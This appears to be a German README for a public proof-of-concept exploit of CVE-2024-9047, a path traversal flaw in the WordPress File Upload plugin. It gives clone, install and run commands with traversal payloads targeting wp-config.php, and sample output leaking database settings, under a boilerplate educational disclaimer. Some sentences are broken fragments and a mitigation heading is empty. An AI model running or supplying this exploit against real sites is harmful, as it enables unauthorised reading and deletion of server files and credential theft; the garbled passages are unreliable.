
Exploit für WordPress File Upload Plugin - Alle Versionen bis 4.24.11 sind anfällig.
Das WordPress File Upload Plugin für WordPress weist eine Path Traversal-Sicherheitslücke in allen Versionen bis einschließlich 4.24.11 über die Datei wfu_file_downloader.php auf. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, Dateien außerhalb des vorgesehenen Verzeichnisses zu lesen oder zu löschen. Eine erfolgreiche Ausnutzung erfordert, dass die betroffene WordPress-Installation PHP 7.4 oder früher ausführt.
Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine speziell gestaltete Anfrage an den gefährdeten Endpunkt wfu_file_downloader.php sendet und den Dateipfad-Parameter manipuliert, um unbefugten Zugriff auf sensible Dateien auf dem Server zu erhalten.
4.24.11 oder früher).7.4 oder früher ausführen.Klonen Sie dieses Repository:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Installieren Sie Python-Abhängigkeiten (falls erforderlich):
pip install requests
Führen Sie das Skript aus, um die Plugin-Version zu überprüfen und die Schwachstelle auszunutzen:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
Um die standardmäßig anfällige Konfiguration auszunutzen und die WordPress-Konfigurationsdatei zu lesen:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
Um Ihre WordPress-Site zu schützen:
Dieser Code dient ausschließlich zu Bildungs- und Forschungszwecken. Die unbefugte Verwendung dieses Skripts auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch. Die Autoren übernehmen keinerlei Verantwortung für den Missbrauch dieses Codes.